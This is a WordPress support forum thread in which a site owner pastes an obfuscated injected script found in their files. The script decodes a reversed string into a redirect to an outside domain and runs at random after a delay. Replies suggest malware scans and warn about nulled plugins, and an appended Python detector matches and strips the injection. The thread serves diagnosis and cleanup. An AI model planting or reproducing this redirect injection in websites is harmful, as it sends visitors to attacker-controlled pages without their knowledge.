Anyone seen this before and any tips on rooting it out?
*script>$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tor/classic-edi<script>$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script*tor.php
Hello,
May I know where you have found this script under any plugin/theme?
Or is your WordPress site compromised? If yes, then you should ask your web hosting provider to run a malware scan on your whole website.
It’s pointless to try and decode malware. What you need to do is find out *why* you were compromised. Typically this is caused by an out-of-date/vulnerable plugin or theme. Install Wordfence and run a scan.
Yes, these are also mostly found in nulled plugins and themes. Scan your site with the Wordfence plugin and clean it.
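A file-level check for the injected block quoted at the top of the thread, as an added example that is not part of any post and is not Wordfence's own logic. The `$zXz` name and the split/reverse/join idiom come from the pasted snippet; the function names, the file suffix list and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Signature taken from the snippet in the thread: a <script> block that defines
# $zXz, reverses a string with split/reverse/join and hands it to setTimeout.
# Quotes may be straight or typographic depending on how the text was stored.
Q = "[\"'\u201c\u201d]"
INJECTION = re.compile(
    r"<script>\s*\$zXz\s*=\s*function.*?\.split\(" + Q + Q
    + r"\)\.reverse\(\)\.join\(" + Q + Q + r"\).*?setTimeout\(.*?</script>",
    re.DOTALL,
)
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}  # assumed set of file types


def scan_tree(root):
    """Return {relative_path: number_of_injected_blocks} for files under root."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            count = len(INJECTION.findall(text))
            if count:
                hits[str(path.relative_to(root))] = count
    return hits


def strip_injection(text):
    """Return text with every matching block removed, for review as a diff."""
    return INJECTION.sub("", text)


def demo():
    # Constructed sample: same shape as the thread's snippet, inert payload string.
    block = ('<script>$zXz=function(n){return $zXz.list[n].split("")'
             '.reverse().join("");};$zXz.list=["REDLOHECALP"];'
             'setTimeout($zXz(0), 18000);</script>')
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "clean.php").write_text("<?php echo 'ok';", encoding="utf-8")
        infected = f"classic-edi{block}tor/classic-edi{block}tor.php"
        (root / "infected.php").write_text(infected, encoding="utf-8")
        hits = scan_tree(root)
        cleaned = strip_injection((root / "infected.php").read_text(encoding="utf-8"))
    return hits, cleaned


if __name__ == "__main__":
    print(demo())
```

A hit only locates copies of the block in files; it does not show how the block got there, and any stripped output should be compared against a known-good copy before it replaces the original.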